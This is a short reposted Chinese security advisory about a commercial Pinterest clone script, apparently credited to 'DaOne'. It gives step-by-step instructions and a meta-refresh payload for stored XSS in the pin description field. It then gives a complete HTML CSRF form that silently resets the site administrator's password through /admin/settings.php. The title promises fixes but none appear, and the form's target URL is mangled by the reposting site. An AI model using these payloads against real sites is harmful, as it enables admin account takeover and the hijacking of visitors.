Pinterest Clone Script多个缺陷及修复

标题: Pinterestclones Multiple Vulnerabilities 
 
作者: DaOne 
 
标价: $199.99 
 
下载地址:  
  
 
[#] [持久型 XSS] 
 
如何测试 
1-go to : /createusernamen/ 
 
2-Put anything in the other field [Password & E-mail] etc... 
 
3-Go to: Add > Upload a Pin and Put in [Description] field the XSS code >Example:<META http-equiv="refresh" content="0;URL=http://www.google.com"> 
 
4-Now anyone go to: will redirected to google.com or exploit your XSS Code. 

 
[#] [远程修改管理密码] 
 
  
 
<form action=" www.2cto.com /admin/settings.php" method="post" class="niceform" name="frmname" enctype="multipart/form-data"> 
 
Name:<input type="text" class="txtFname" name="name" id="name" size="50" value="Admin"/> 
 
User Name:<input type="text" class="txtFname" name="uname" readonly="readonly" id="uname" size="50" value="admin@pinterestclones.com"/> 
 
New Password:<input type="password" class="txtFname" name="password" id="password" size="50" value=""/> 
 
Confirm Password:<input type="password" class="txtFname" name="cpassword" id="cpassword" size="50" value=""/> 
 
Site Slogan:<input type="text" name="txtSlogan" id="txtSlogan" size="50" value="Your online pinboard"/> 
 
Site URL:<input type="text" name="txtUrl" id="txtUrl" size="50" value=""/> 
 
Admin Email:<input type="text" name="aemail" id="aemail" size="50" value=""/> 
 
�Under maintenance:<select name="maintenance"> 
 
<option value="No" selected>No</option> 
 
<option value="Yes">Yes</option> 
 
</select> 
 
Maintenance message: 
 
<input type="text" name="maintenancemsg" id="maintenancemsg" size="50" value="We are upgrading the site."/> 
 
<dl class="submit"> 
 
<input type="submit" value="Save" class="submit" name="sbmtbtn" style="width:50px;"/> 
 
</form> 
 
  
  ，涛涛电脑知识网，涛涛电脑知识网

• 没有相关文章